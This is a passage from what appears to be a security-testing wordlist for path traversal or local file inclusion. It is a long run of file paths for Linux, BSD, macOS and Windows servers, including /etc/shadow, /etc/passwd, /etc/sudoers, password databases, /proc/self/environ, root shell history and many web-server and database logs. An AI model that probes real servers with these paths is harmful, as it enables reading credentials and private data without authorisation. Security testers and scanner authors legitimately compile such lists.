n/etc/ftpchroot\n/etc/ftphosts\n/etc/ftpusers\n/etc/fuse.conf\n/etc/group\n/etc/group-\n/etc/hdparm.conf\n/etc/host.conf\n/etc/hostname\n/etc/hosts\n/etc/hosts.allow\n/etc/hosts.deny\n/etc/http/conf/httpd.conf\n/etc/http/httpd.conf\n/etc/httpd.conf\n/etc/httpd/apache.conf\n/etc/httpd/apache2.conf\n/etc/httpd/conf\n/etc/httpd/conf.d\n/etc/httpd/conf.d/php.conf\n/etc/httpd/conf.d/squirrelmail.conf\n/etc/httpd/conf/apache.conf\n/etc/httpd/conf/apache2.conf\n/etc/httpd/conf/httpd.conf\n/etc/httpd/extra/httpd-ssl.conf\n/etc/httpd/httpd.conf\n/etc/httpd/logs/access.log\n/etc/httpd/logs/access_log\n/etc/httpd/logs/error.log\n/etc/httpd/logs/error_log\n/etc/httpd/mod_php.conf\n/etc/httpd/php.ini\n/etc/inetd.conf\n/etc/init.d\n/etc/inittab\n/etc/ipfw.conf\n/etc/ipfw.rules\n/etc/issue\n/etc/issue\n/etc/issue.net\n/etc/kbd/config\n/etc/kernel-img.conf\n/etc/kernel-pkg.conf\n/etc/ld.so.conf\n/etc/ldap/ldap.conf\n/etc/lighttpd/lighthttpd.conf\n/etc/login.defs\n/etc/logrotate.conf\n/etc/logrotate.d/ftp\n/etc/logrotate.d/proftpd\n/etc/logrotate.d/vsftpd.log\n/etc/ltrace.conf\n/etc/mail/sendmail.conf\n/etc/mandrake-release\n/etc/manpath.config\n/etc/miredo-server.conf\n/etc/miredo.conf\n/etc/miredo/miredo-server.conf\n/etc/miredo/miredo.conf\n/etc/modprobe.d/vmware-tools.conf\n/etc/modules\n/etc/mono/1.0/machine.config\n/etc/mono/2.0/machine.config\n/etc/mono/2.0/web.config\n/etc/mono/config\n/etc/motd\n/etc/motd\n/etc/mtab\n/etc/mtools.conf\n/etc/muddleftpd.com\n/etc/muddleftpd/muddleftpd.conf\n/etc/muddleftpd/muddleftpd.passwd\n/etc/muddleftpd/mudlog\n/etc/muddleftpd/mudlogd.conf\n/etc/muddleftpd/passwd\n/etc/my.cnf\n/etc/mysql/conf.d/old_passwords.cnf\n/etc/mysql/my.cnf\n/etc/networks\n/etc/newsyslog.conf\n/etc/nginx/nginx.conf\n/etc/openldap/ldap.conf\n/etc/os-release\n/etc/osxhttpd/osxhttpd.conf\n/etc/pam.conf\n/etc/pam.d/proftpd\n/etc/passwd\n/etc/passwd\n/etc/passwd-\n/etc/passwd~\n/etc/password.master\n/etc/php.ini\n/etc/php/apache/php.ini\n/etc/php/apache2/php.ini\n/etc/php/cgi/php.ini\n/etc/php/php.ini\n/etc/php/php4/php.ini\n/etc/php4.4/fcgi/php.ini\n/etc/php4/apache/php.ini\n/etc/php4/apache2/php.ini\n/etc/php4/cgi/php.ini\n/etc/php5/apache/php.ini\n/etc/php5/apache2/php.ini\n/etc/php5/cgi/php.ini\n/etc/phpmyadmin/config.inc.php\n/etc/postgresql/pg_hba.conf\n/etc/postgresql/postgresql.conf\n/etc/profile\n/etc/proftp.conf\n/etc/proftpd/modules.conf\n/etc/protpd/proftpd.conf\n/etc/pulse/client.conf\n/etc/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.conf\n/etc/pure-ftpd/pure-ftpd.pdb\n/etc/pure-ftpd/pureftpd.pdb\n/etc/pureftpd.passwd\n/etc/pureftpd.pdb\n/etc/rc.conf\n/etc/rc.d/rc.httpd\n/etc/redhat-release\n/etc/resolv.conf\n/etc/resolvconf/update-libc.d/sendmail\n/etc/samba/dhcp.conf\n/etc/samba/netlogon\n/etc/samba/private/smbpasswd\n/etc/samba/samba.conf\n/etc/samba/smb.conf\n/etc/samba/smb.conf.user\n/etc/samba/smbpasswd\n/etc/samba/smbusers\n/etc/security/access.conf\n/etc/security/environ\n/etc/security/failedlogin\n/etc/security/group\n/etc/security/group.conf\n/etc/security/lastlog\n/etc/security/limits\n/etc/security/limits.conf\n/etc/security/namespace.conf\n/etc/security/opasswd\n/etc/security/pam_env.conf\n/etc/security/passwd\n/etc/security/sepermit.conf\n/etc/security/time.conf\n/etc/security/user\n/etc/sensors.conf\n/etc/sensors3.conf\n/etc/shadow\n/etc/shadow-\n/etc/shadow~\n/etc/slackware-release\n/etc/smb.conf\n/etc/smbpasswd\n/etc/smi.conf\n/etc/squirrelmail/apache.conf\n/etc/squirrelmail/config.php\n/etc/squirrelmail/config/config.php\n/etc/squirrelmail/config_default.php\n/etc/squirrelmail/config_local.php\n/etc/squirrelmail/default_pref\n/etc/squirrelmail/filters_setup.php\n/etc/squirrelmail/index.php\n/etc/squirrelmail/sqspell_config.php\n/etc/ssh/sshd_config\n/etc/sso/sso_config.ini\n/etc/stunnel/stunnel.conf\n/etc/subversion/config\n/etc/sudoers\n/etc/suse-release\n/etc/sw-cp-server/applications.d/00-sso-cpserver.conf\n/etc/sw-cp-server/applications.d/plesk.conf\n/etc/sysconfig/network-scripts/ifcfg-eth0\n/etc/sysctl.conf\n/etc/sysctl.d/10-console-messages.conf\n/etc/sysctl.d/10-network-security.conf\n/etc/sysctl.d/10-process-security.conf\n/etc/sysctl.d/wine.sysctl.conf\n/etc/syslog.conf\n/etc/timezone\n/etc/tinyproxy/tinyproxy.conf\n/etc/tor/tor-tsocks.conf\n/etc/tsocks.conf\n/etc/updatedb.conf\n/etc/updatedb.conf.beforevmwaretoolsinstall\n/etc/utmp\n/etc/vhcs2/proftpd/proftpd.conf\n/etc/vmware-tools/config\n/etc/vmware-tools/tpvmlp.conf\n/etc/vmware-tools/vmware-tools-libraries.conf\n/etc/vsftpd.chroot_list\n/etc/vsftpd.conf\n/etc/vsftpd/vsftpd.conf\n/etc/webmin/miniserv.conf\n/etc/webmin/miniserv.users\n/etc/wicd/dhclient.conf.template.default\n/etc/wicd/manager-settings.conf\n/etc/wicd/wired-settings.conf\n/etc/wicd/wireless-settings.conf\n/etc/wu-ftpd/ftpaccess\n/etc/wu-ftpd/ftphosts\n/etc/wu-ftpd/ftpusers\n/etc/x11/xorg.conf\n/etc/x11/xorg.conf-vesa\n/etc/x11/xorg.conf-vmware\n/etc/x11/xorg.conf.beforevmwaretoolsinstall\n/etc/x11/xorg.conf.orig\n/home/bin/stable/apache/php.ini\n/home/postgres/data/pg_hba.conf\n/home/postgres/data/pg_ident.conf\n/home/postgres/data/pg_version\n/home/postgres/data/postgresql.conf\n/home/user/lighttpd/lighttpd.conf\n/home2/bin/stable/apache/php.ini\n/http/httpd.conf\n/library/webserver/documents/.htaccess\n/library/webserver/documents/default.htm\n/library/webserver/documents/default.html\n/library/webserver/documents/default.php\n/library/webserver/documents/index.htm\n/library/webserver/documents/index.html\n/library/webserver/documents/index.php\n/logs/access.log\n/logs/access_log\n/logs/error.log\n/logs/error_log\n/logs/pure-ftpd.log\n/logs/security_debug_log\n/logs/security_log\n/mysql/bin/my.ini\n/mysql/data/mysql-bin.index\n/mysql/data/mysql-bin.log\n/mysql/data/mysql.err\n/mysql/data/mysql.log\n/mysql/my.cnf\n/mysql/my.ini\n/netserver/bin/stable/apache/php.ini\n/opt/jboss/server/default/conf/jboss-minimal.xml\n/opt/jboss/server/default/conf/jboss-service.xml\n/opt/jboss/server/default/conf/jndi.properties\n/opt/jboss/server/default/conf/log4j.xml\n/opt/jboss/server/default/conf/login-config.xml\n/opt/jboss/server/default/conf/server.log.properties\n/opt/jboss/server/default/conf/standardjaws.xml\n/opt/jboss/server/default/conf/standardjboss.xml\n/opt/jboss/server/default/deploy/jboss-logging.xml\n/opt/jboss/server/default/log/boot.log\n/opt/jboss/server/default/log/server.log\n/opt/apache/apache.conf\n/opt/apache/apache2.conf\n/opt/apache/conf/apache.conf\n/opt/apache/conf/apache2.conf\n/opt/apache/conf/httpd.conf\n/opt/apache2/apache.conf\n/opt/apache2/apache2.conf\n/opt/apache2/conf/apache.conf\n/opt/apache2/conf/apache2.conf\n/opt/apache2/conf/httpd.conf\n/opt/apache22/conf/httpd.conf\n/opt/httpd/apache.conf\n/opt/httpd/apache2.conf\n/opt/httpd/conf/apache.conf\n/opt/httpd/conf/apache2.conf\n/opt/lampp/etc/httpd.conf\n/opt/lampp/logs/access.log\n/opt/lampp/logs/access_log\n/opt/lampp/logs/error.log\n/opt/lampp/logs/error_log\n/opt/lsws/conf/httpd_conf.xml\n/opt/lsws/logs/access.log\n/opt/lsws/logs/error.log\n/opt/tomcat/logs/catalina.err\n/opt/tomcat/logs/catalina.out\n/opt/xampp/etc/php.ini\n/opt/xampp/logs/access.log\n/opt/xampp/logs/access_log\n/opt/xampp/logs/error.log\n/opt/xampp/logs/error_log\n/php/php.ini\n/php/php.ini\n/php4/php.ini\n/php5/php.ini\n/postgresql/log/pgadmin.log\n/private/etc/httpd/apache.conf\n/private/etc/httpd/apache2.conf\n/private/etc/httpd/httpd.conf\n/private/etc/httpd/httpd.conf.default\n/private/etc/squirrelmail/config/config.php\n/proc/cpuinfo\n/proc/devices\n/proc/meminfo\n/proc/net/tcp\n/proc/net/udp\n/proc/self/cmdline\n/proc/self/environ\n/proc/self/environ\n/proc/self/fd/0\n/proc/self/fd/1\n/proc/self/fd/10\n/proc/self/fd/11\n/proc/self/fd/12\n/proc/self/fd/13\n/proc/self/fd/14\n/proc/self/fd/15\n/proc/self/fd/2\n/proc/self/fd/3\n/proc/self/fd/4\n/proc/self/fd/5\n/proc/self/fd/6\n/proc/self/fd/7\n/proc/self/fd/8\n/proc/self/fd/9\n/proc/self/mounts\n/proc/self/stat\n/proc/self/status\n/proc/version\n/program files/jboss/server/default/conf/jboss-minimal.xml\n/program files/jboss/server/default/conf/jboss-service.xml\n/program files/jboss/server/default/conf/jndi.properties\n/program files/jboss/server/default/conf/log4j.xml\n/program files/jboss/server/default/conf/login-config.xml\n/program files/jboss/server/default/conf/server.log.properties\n/program files/jboss/server/default/conf/standardjaws.xml\n/program files/jboss/server/default/conf/standardjboss.xml\n/program files/jboss/server/default/deploy/jboss-logging.xml\n/program files/jboss/server/default/log/boot.log\n/program files/jboss/server/default/log/server.log\n/program files/apache group/apache/apache.conf\n/program files/apache group/apache/apache2.conf\n/program files/apache group/apache/conf/apache.conf\n/program files/apache group/apache/conf/apache2.conf\n/program files/apache group/apache/conf/httpd.conf\n/program files/apache group/apache/logs/access.log\n/program files/apache group/apache/logs/error.log\n/program files/apache group/apache2/conf/apache.conf\n/program files/apache group/apache2/conf/apache2.conf\n/program files/apache group/apache2/conf/httpd.conf\n/program files/apache software foundation/apache2.2/conf/httpd.conf\n/program files/apache software foundation/apache2.2/logs/access.log\n/program files/apache software foundation/apache2.2/logs/error.log\n/program files/mysql/data/mysql-bin.index\n/program files/mysql/data/mysql-bin.log\n/program files/mysql/data/mysql.err\n/program files/mysql/data/mysql.log\n/program files/mysql/my.cnf\n/program files/mysql/my.ini\n/program files/mysql/mysql server 5.0/data/mysql-bin.index\n/program files/mysql/mysql server 5.0/data/mysql-bin.log\n/program files/mysql/mysql server 5.0/data/mysql.err\n/program files/mysql/mysql server 5.0/data/mysql.log\n/program files/mysql/mysql server 5.0/my.cnf\n/program files/mysql/mysql server 5.0/my.ini\n/program files/postgresql/8.3/data/pg_hba.conf\n/program files/postgresql/8.3/data/pg_ident.conf\n/program files/postgresql/8.3/data/postgresql.conf\n/program files/postgresql/8.4/data/pg_hba.conf\n/program files/postgresql/8.4/data/pg_ident.conf\n/program files/postgresql/8.4/data/postgresql.conf\n/program files/postgresql/9.0/data/pg_hba.conf\n/program files/postgresql/9.0/data/pg_ident.conf\n/program files/postgresql/9.0/data/postgresql.conf\n/program files/postgresql/9.1/data/pg_hba.conf\n/program files/postgresql/9.1/data/pg_ident.conf\n/program files/postgresql/9.1/data/postgresql.conf\n/program files/vidalia bundle/polipo/polipo.conf\n/program files/xampp/apache/conf/apache.conf\n/program files/xampp/apache/conf/apache2.conf\n/program files/xampp/apache/conf/httpd.conf\n/root/.bash_config\n/root/.bash_history\n/root/.bash_logout\n/root/.bashrc\n/root/.ksh_history\n/root/.xauthority\n/srv/www/htdos/squirrelmail/config/config.php\n/ssl_request_log        \n/system/library/webobjects/adaptors/apache2.2/apache.conf\n/temp/sess_\n/thttpd_log\n/tmp/jboss/server/default/conf/jboss-minimal.xml\n/tmp/jboss/server/default/conf/jboss-service.xml\n/tmp/jboss/server/default/conf/jndi.properties\n/tmp/jboss/server/default/conf/log4j.xml\n/tmp/jboss/server/default/conf/login-config.xml\n/tmp/jboss/server/default/conf/server.log.properties\n/tmp/jboss/server/default/conf/standardjaws.xml\n/tmp/jboss/server/default/conf/standardjboss.xml\n/tmp/jboss/server/default/deploy/jboss-logging.xml\n/tmp/jboss/server/default/log/boot.log\n/tmp/jboss/server/default/log/server.log\n/tmp/access.log\n/tmp/sess_\n/usr/apache/conf/httpd.conf\n/usr/apache2/conf/httpd.conf\n/usr/etc/pure-ftpd.conf\n/usr/home/user/lighttpd/lighttpd.conf\n/usr/home/user/var/log/apache.log\n/usr/home/user/var/log/lighttpd.error.log\n/usr/internet/pgsql/data/pg_hba.conf\n/usr/internet/pgsql/data/postmaster.log\n/usr/lib/cron/log\n/usr/lib/php.ini\n/usr/lib/php/php.ini\n/usr/lib/security/mkuser.default\n/usr/local/jboss/server/default/conf/jboss-minimal.xml\n/usr/local/jboss/server/default/conf/jboss-service.xml\n/usr/local/jboss/server/default/conf/jndi.properties\n/usr/local/jboss/server/default/conf/log4j.xml\n/usr/local/jboss/server/default/conf/login-config.xml\n/usr/local/jboss/server/default/conf/server.log.properties\n/usr/local/jboss/server/default/conf/standardjaws.xml\n/usr/local/jboss/server/default/conf/standardjboss.xml\n/usr/local/jboss/server/default/deploy/jboss-logging.xml\n/usr/local/jboss/server/default/log/boot.log\n/usr/local/jboss/server/default/log/server.log\n/usr/local/apache/apache.conf\n/usr/local/apache/apache2.conf\n/usr/local/apache/conf/access.conf\n/usr/local/apache/conf/apache.conf\n/usr/local/apache/conf/apache2.conf\n/usr/local/apache/conf/httpd.conf\n/usr/local/apache/conf/httpd.conf.default\n/usr/local/apache/conf/modsec.conf\n/usr/local/apache/conf/php.ini\n/usr/local/apache/conf/vhosts-custom.conf\n/usr/local/apache/conf/vhosts.conf\n/usr/local/apache/httpd.conf\n/usr/local/apache/logs/access.log\n/usr/local/apache/logs/access_log\n/usr/local/apache/logs/audit_log\n/usr/local/apache/logs/error.log\n/usr/local/apache/logs/error_log\n/usr/local/apache/logs/lighttpd.error.log\n/usr/local/apache/logs/lighttpd.log\n/usr/local/apache/logs/mod_jk.log\n/usr/local/apache1.3/conf/httpd.conf\n/usr/local/apache2/apache.conf\n/usr/local/apache2/apache2.conf\n/usr/local/apache2/conf/apache.conf\n/usr/local/apache2/conf/apache2.conf\n/usr/local/apache2/conf/extra/httpd-ssl.conf\n/usr/local/apache2/conf/httpd.conf\n/usr/local/apache2/conf/modsec.conf\n/usr/local/apache2/conf/ssl.conf\n/usr/local/apache2/conf/vhosts-custom.conf\n/usr/local/apache2/conf/vhosts.conf\n/usr/local/apache2/httpd.conf\n/usr/local/apache2/logs/access.log\n/usr/local/apache2/logs/access_log\n/usr/local/apache2/logs/audit_log\n/usr/local/apache2/logs/error.log\n/usr/local/apache2/logs/error_log\n/usr/local/apache2/logs/lighttpd.error.log\n/usr/local/apache2/logs/lighttpd.log\n/usr/local/apache22/conf/httpd.conf\n/usr/local/apache22/httpd.conf\n/usr/local/apps/apache/conf/httpd.conf\n/usr/local/apps/apache2/conf/httpd.conf\n/usr/local/apps/apache22/conf/httpd.conf\n/usr/local/cpanel/logs/access_log\n/usr/local/cpanel/logs/error_log\n/usr/local/cpanel/logs/license_log\n/usr/local/cpanel/logs/login_log\n/usr/local/cpanel/logs/stats_log\n/usr/local/etc/apache/conf/httpd.conf\n/usr/local/etc/apache/httpd.conf\n/usr/local/etc/apache/vhosts.conf\n/usr/local/etc/apache2/conf/httpd.conf\n/usr/local/etc/apache2/httpd.conf\n/usr/local/etc/apache2/vhosts.conf\n/usr/local/etc/apache22/conf/httpd.conf\n/usr/local/etc/apache22/httpd.conf\n/usr/local/etc/httpd/conf\n/usr/local/etc/httpd/conf/httpd.conf\n/usr/local/etc/lighttpd.conf\n/usr/local/etc/lighttpd.conf.new\n/usr/local/etc/nginx/nginx.conf\n/usr/local/etc/php.ini\n/usr/local/etc/pure-ftpd.conf\n/usr/local/etc/pureftpd.pdb\n/usr/local/etc/smb.conf\n/usr/local/etc/webmin/miniserv.conf\n/usr/local/etc/webmin/miniserv.users\n/usr/local/httpd/conf/httpd.conf\n/usr/local/jakarta/dist/tomcat/conf/context.xml\n/usr/local/jakarta/dist/tomcat/conf/jakarta.conf\n/usr/local/jakarta/dist/tomcat/conf/logging.properties\n/usr/local/jakarta/dist/tomcat/conf/server.xml\n/usr/local/jakarta/dist/tomcat/conf/workers.properties\n/usr/local/jakarta/dist/tomcat/logs/mod_jk.log\n/usr/local/jakarta/tomcat/conf/context.xml\n/usr/local/jakarta/tomcat/conf/jakarta.conf\n/usr/local/jakarta/tomcat/conf/logging.properties\n/usr/local/jakarta/tomcat/conf/server.xml\n/usr/local/jakarta/tomcat/conf/workers.properties\n/usr/local/jakarta/tomcat/logs/catalina.err\n/usr/local/jakarta/tomcat/logs/catalina.out\n/usr/local/jakarta/tomcat/logs/mod_jk.log\n/usr/local/lib/php.ini\n/usr/local/lighttpd/conf/lighttpd.conf\n/usr/local/lighttpd/log/access.log\n/usr/local/lighttpd/log/lighttpd.error.log\n/usr/local/logs/access.log\n/usr/local/logs/samba.log\n/usr/local/lsws/conf/httpd_conf.xml\n/usr/local/lsws/logs/error.log\n/usr/local/mysql/data/mysql-bin.index\n/usr/local/mysql/data/mysql-bin.log\n/usr/local/mysql/data/mysql-slow.log\n/usr/local/mysql/data/mysql.err\n/usr/local/mysql/data/mysql.log\n/usr/local/mysql/data/mysqlderror.log\n/usr/local/nginx/conf/nginx.conf\n/usr/local/pgsql/bin/pg_passwd\n/usr/local/pgsql/data/passwd\n/usr/local/pgsql/data/pg_hba.conf\n/usr/local/pgsql/data/pg_log\n/usr/local/pgsql/data/postgresql.conf\n/usr/local/pgsql/data/postgresql.log\n/usr/local/php/apache.conf\n/usr/local/php/apache.conf.php\n/usr/local/php/apache2.conf\n/usr/local/php/apache2.conf.php\n/usr/local/php/httpd.conf\n/usr/local/php/httpd.conf.php\n/usr/local/php/lib/php.ini\n/usr/local/php4/apache.conf\n/usr/local/php4/apache.conf.php\n/usr/local/php4/apache2.conf\n/usr/local/php4/apache2.conf.php\n/usr/local/php4/httpd.conf\n/usr/local/php4/httpd.conf.php\n/usr/local/php4/lib/php.ini\n/usr/local/php5/apache.conf\n/usr/local/php5/apache.conf.php\n/usr/local/php5/apache2.conf\n/usr/local/php5/apache2.conf.php\n/usr/local/php5/httpd.conf\n/usr/local/php5/httpd.conf.php\n/usr/local/php5/lib/php.ini\n/usr/local/psa/admin/conf/php.ini\n/usr/local/psa/admin/conf/site_isolation_settings.ini\n/usr/local/psa/admin/htdocs/domains/databases/phpmyadmin/libraries/config.default.php\n/usr/local/psa/admin/logs/httpsd_access_log\n/usr/local/psa/admin/logs/panel.log\n/usr/local/pureftpd/etc/pure-ftpd.conf\n/usr/local/pureftpd/etc/pureftpd.pdb\n/usr/local/pureftpd/sbin/pure-config.pl\n/usr/local/samba/lib/log.user\n/usr/local/samba/lib/smb.conf.user\n/usr/local/sb/config\n/usr/local/squirrelmail/www/readme\n/usr/local/zend/etc/php.ini\n/usr/local/zeus/web/global.cfg\n/usr/local/zeus/web/log/errors\n/usr/pkg/etc/httpd/httpd-default.conf\n/usr/pkg/etc/httpd/httpd-vhosts.conf\n/usr/pkg/etc/httpd/httpd.conf\n/usr/pkgsrc/net/pureftpd/pure-ftpd.conf\n/usr/pkgsrc/net/pureftpd/pureftpd.passwd\n/usr/pkgsrc/net/pureftpd/pureftpd.pdb\n/usr/ports/contrib/pure-ftpd/pure-ftpd.conf\n/usr/ports/contrib/pure-ftpd/pureftpd.passwd\n/usr/ports/contrib/pure-ftpd/pureftpd.pdb\n/usr/ports/ftp/pure-ftpd/pure-ftpd.conf\n/usr/ports/ftp/pure-ftpd/pureftpd.passwd\n/usr/ports/ftp/pure-ftpd/pureftpd.pdb\n/usr/ports/net/pure-ftpd/pure-ftpd.conf\n/usr/ports/net/pure-ftpd/pureftpd.passwd\n/usr/ports/net/pure-ftpd/pureftpd.pdb\n/usr/sbin/mudlogd\n/usr/sbin/mudpasswd\n/usr/sbin/pure-config.pl\n/usr/share/adduser/adduser.conf\n/usr/share/logs/catalina.err\n/usr/share/logs/catalina.out\n/usr/share/squirrelmail/config/config.php\n/usr/share/squirrelmail/plugins/squirrel_logger/setup.php\n/usr/share/tomcat/logs/catalina.err\n/usr/share/tomcat/logs/catalina.out\n/usr/share/tomcat6/conf/context.xml\n/usr/share/tomcat6/conf/logging.properties\n/usr/share/tomcat6/conf/server.xml\n/usr/share/tomcat6/conf/workers.properties\n/usr/share/tomcat6/logs/catalina.err\n/usr/share/tomcat6/logs/catalina.out\n/usr/spool/lp/log\n/usr/spool/mqueue/syslog\n/var/adm/acct/sum/loginlog\n/var/adm/aculog\n/var/adm/aculogs\n/var/adm/crash/unix\n/var/adm/crash/vmcore\n/var/adm/cron/log\n/var/adm/dtmp\n/var/adm/lastlog/username\n/var/adm/log/asppp.log\n/var/adm/log/xferlog\n/var/adm/loginlog\n/var/adm/lp/lpd-errs\n/var/adm/messages\n/var/adm/pacct\n/var/adm/qacct\n/var/adm/ras/bootlog\n/var/adm/ras/errlog\n/var/adm/sulog\n/var/adm/syslog\n/var/adm/utmp\n/var/adm/utmpx\n/var/adm/vold.log\n/var/adm/wtmp\n/var/adm/wtmpx\n/var/adm/x0msgs\n/var/apache/conf/httpd.conf\n/var/cpanel/cpanel.config\n/var/cpanel/tomcat.options\n/var/cron/log\n/var/data/mysql-bin.index\n/var/lib/mysql/my.cnf\n/var/lib/pgsql/data/postgresql.conf\n/var/lib/squirrelmail/prefs/squirrelmail.log\n/var/lighttpd.log\n/var/local/www/conf/php.ini\n/var/log/access.log\n/var/log/access_log\n/var/log/apache/access.log\n/var/log/apache/access_log\n/var/log/apache/error.log\n/var/log/apache/error_log\n/var/log/apache2/access.log\n/var/log/apache2/access_log\n/var/log/apache2/error.log\n/var/log/apache2/error_log\n/var/log/apache2/squirrelmail.err.log\n/var/log/apache2/squirrelmail.log\n/var/log/auth.log\n/var/log/auth.log\n/var/log/authlog\n/var/log/boot.log\n/var/log/cron/var/log/postgres.log\n/var/log/daemon.log\n/var/log/daemon.log.1\n/var/log/data/mysql-bin.index\n/var/log/error.log\n/var/log/error_log\n/var/log/exim/mainlog\n/var/log/exim/paniclog\n/var/log/exim/rejectlog\n/var/log/exim_mainlog\n/var/log/exim_paniclog\n/var/log/exim_rejectlog\n/var/log/ftp-proxy\n/var/log/ftp-proxy/ftp-proxy.log\n/var/log/ftplog\n/var/log/httpd/access.log\n/var/log/httpd/access_log\n/var/log/httpd/error.log\n/var/log/httpd/error_log\n/var/log/ipfw\n/var/log/ipfw.log\n/var/log/ipfw.today\n/var/log/ipfw/ipfw.log\n/var/log/kern.log\n/var/log/kern.log.1\n/var/log/lighttpd.access.log\n/var/log/lighttpd.error.log\n/var/log/lighttpd/access.log\n/var/log/lighttpd/access.www.log\n/var/log/lighttpd/error.log\n/var/log/lighttpd/error.www.log\n/var/log/log.smb\n/var/log/mail.err\n/var/log/mail.info\n/var/log/mail.log\n/var/log/mail.log\n/var/log/mail.warn\n/var/log/maillog\n/var/log/messages\n/var/log/messages.1\n/var/log/muddleftpd\n/var/log/muddleftpd.conf\n/var/log/mysql-bin.index\n/var/log/mysql.err\n/var/log/mysql.log\n/var/log/mysql/data/mysql-bin.index\n/var/log/mysql/mysql-bin.index\n/var/log/mysql/mysql-bin.log\n/var/log/mysql/mysql-slow.log\n/var/log/mysql/mysql.log\n/var/log/mysqlderror.log\n/var/log/news.all\n/var/log/news/news.all\n/var/log/news/news.crit\n/var/log/news/news.err\n/var/log/news/news.notice\n/var/log/news/suck.err\n/var/log/news/suck.notice\n/var/log/nginx.access_log\n/var/log/nginx.error_log\n/var/log/nginx/access.log\n/var/log/nginx/access_log\n/var/log/nginx/error.log\n/var/log/nginx/error_log\n/var/log/pgsql/pgsql.log\n/var/log/pgsql8.log\n/var/log/pgsql_log\n/var/log/pm-powersave.log\n/var/log/poplog\n/var/log/postgres/pg_backup.log\n/var/log/postgres/postgres.log\n/var/log/postgresql.log\n/var/log/postgresql/main.log\n/var/log/postgresql/postgres.log\n/var/log/postgresql/postgresql-8.1-main.log\n/var/log/postgresql/postgresql-8.3-main.log\n/var/log/postgresql/postgresql-8.4-main.log\n/var/log/postgresql/postgresql-9.0-main.log\n/var/log/postgresql/postgresql-9.1-main.log\n/var/log/postgresql/postgresql.log\n/var/log/proftpd\n/var/log/proftpd.access_log\n/var/log/proftpd.xferlog\n/var/log/proftpd/xferlog.legacy\n/var/log/pure-ftpd/pure-ftpd.log\n/var/log/pureftpd.log\n/var/log/samba.log\n/var/log/samba.log1\n/var/log/samba.log2\n/var/log/samba/log.nmbd\n/var/log/samba/log.smbd\n/var/log/squirrelmail.log\n/var/log/sso/sso.log\n/var/log/sw-cp-server/error_log\n/var/log/syslog\n/var/log/syslog.1\n/var/log/thttpd_log\n/var/log/tomcat6/catalina.out\n/var/log/ufw.log\n/var/log/user.log\n/var/log/user.log.1\n/var/log/vmware/hostd-1.log\n/var/log/vmware/hostd.log\n/var/log/vsftpd.log\n/var/log/webmin/miniserv.log\n/var/log/xferlog\n/var/log/xorg.0.log\n/var/logs/access.log\n/var/lp/logs/lpnet\n/var/lp/logs/lpsched\n/var/lp/logs/requests\n/var/mysql-bin.index\n/var/mysql.log\n/var/nm2/postgresql.conf\n/var/postgresql/db/postgresql.conf\n/var/postgresql/log/postgresql.log\n/var/saf/_log\n/var/saf/port/log\n/var/www/.lighttpdpassword\n/var/www/conf\n/var/www/conf/httpd.conf\n/var/www/html/squirrelmail-1.2.9/config/config.php\n/var/www/html/squirrelmail/config/config.php\n/var/www/logs/access.log\n/var/www/logs/access_log\n/var/www/logs/error.log\n/var/www/logs/error_log\n/var/www/squirrelmail/config/config.php\n/volumes/macintosh_hd1/opt/apache/conf/httpd.conf\n/volumes/macintosh_hd1/opt/apache2/conf/httpd.conf\n/volumes/macintosh_hd1/opt/httpd/conf/httpd.conf\n/volumes/macintosh_hd1/usr/local/php/httpd.conf.php\n/volumes/macintosh_hd1/usr/local/php/lib/php.ini\n/volumes/macintosh_hd1/usr/local/php4/httpd.conf.php\n/volumes/macintosh_hd1/usr/local/php5/httpd.conf.php\n/volumes/webbackup/opt/apache2/conf/httpd.conf\n/volumes/webbackup/private/etc/httpd/httpd.conf\n/volumes/webbackup/private/etc/httpd/httpd.conf.default\n/wamp/bin/apache/apache2.2.21/conf/httpd.conf\n/wamp/bin/apache/apache2.2.21/logs/access.log\n/wamp/bin/apache/apache2.2.21/logs/error.log\n/wamp/bin/apache/apache2.2.21/wampserver.conf\n/wamp/bin/apache/apache2.2.22/conf/httpd.conf\n/wamp/bin/apache/apache2.2.22/conf/wampserver.conf\n/wamp/bin/apache/apache2.2.22/logs/access.log\n/wamp/bin/apache/apache2.2.22/logs/error.log\n/wamp/bin/apache/apache2.2.22/wampserver.conf\n/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index\n/wamp/bin/mysql/mysql5.5.16/my.ini\n/wamp/bin/mysql/mysql5.5.16/wampserver.conf\n/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index\n/wamp/bin/mysql/mysql5.5.24/my.ini\n/wamp/bin/mysql/mysql5.5.24/wampserver.conf\n/wamp/bin/php/php5.3.8/php.ini\n/wamp/bin/php/php5.4.3/php.ini\n/wamp/logs/access.log\n/wamp/logs/apache_error.log\n/wamp/logs/genquery.log\n/wamp/logs/mysql.log\n/wamp/logs/slowquery.log\n/web/conf/php.ini\n/windows/comsetup.log\n/windows/debug/netsetup.log\n/windows/odbc.ini\n/windows/php.ini\n/windows/repair/setup.log\n/windows/setupact.log\n/windows/setupapi.log\n/windows/setuperr.log\n/windows/win.ini\n/windows/system32/drivers/etc/hosts\n/windows/system32/drivers/etc/lmhosts.sam\n/windows/system32/drivers/etc/networks\n/windows/system32/drivers/etc/protocol\n/windows/system32/drivers/etc/services\n/windows/system32/logfiles/firewall/pfirewall.log\n/windows/system32/logfiles/firewall/pfirewall.log.old\n/windows/system32/logfiles/msftpsvc\n/windows/system32/logfiles/msftpsvc1\n/windows/system32/logfiles/msftpsvc2\n/windows/system32/logfiles/smtpsvc\n/windows/system32/logfiles/smtpsvc1\n/windows/system32/logfiles/smtpsvc2\n/windows/system32/logfiles/smtpsvc3\n/windows/system32/logfiles/smtpsvc4\n/windows/system32/logfiles/smtpsvc5\n/windows/system32/logfiles/w3svc/inetsvn1.log\n/windows/system32/logfiles/w3svc1/inetsvn1.log\n/windows/system32/logfiles/w3svc2/inetsvn1.log\n/windows/system32/logfiles/w3svc3/inetsvn1.log\n/windows/system32/macromed/flash/flashinstall.log\n/windows/system32/macromed/flash/install.log\n/windows/updspapi.log\n/windows/windowsupdate.log\n/windows/wmsetup.log\n/winnt/php.ini\n/winnt/system32/logfiles/firewall/pfirewall.log\n/winnt/system32/logfiles/firewall/pfirewall.log.old\n/winnt/system32/logfiles/msftpsvc\n/winnt/system32/logfiles/msftpsvc1\n/winnt/system32/logfiles/msftpsvc2\n/winnt/system32/logfiles/smtpsvc\n/winnt/system32/logfiles/smtpsvc1\n/winnt/system32/logfiles/smtpsvc2\n/winnt/system32/logfiles/smtpsvc3\n/winnt/system32/logfiles/smtpsvc4\n/winnt/system32/logfiles/smtpsvc5\n/winnt/system32/l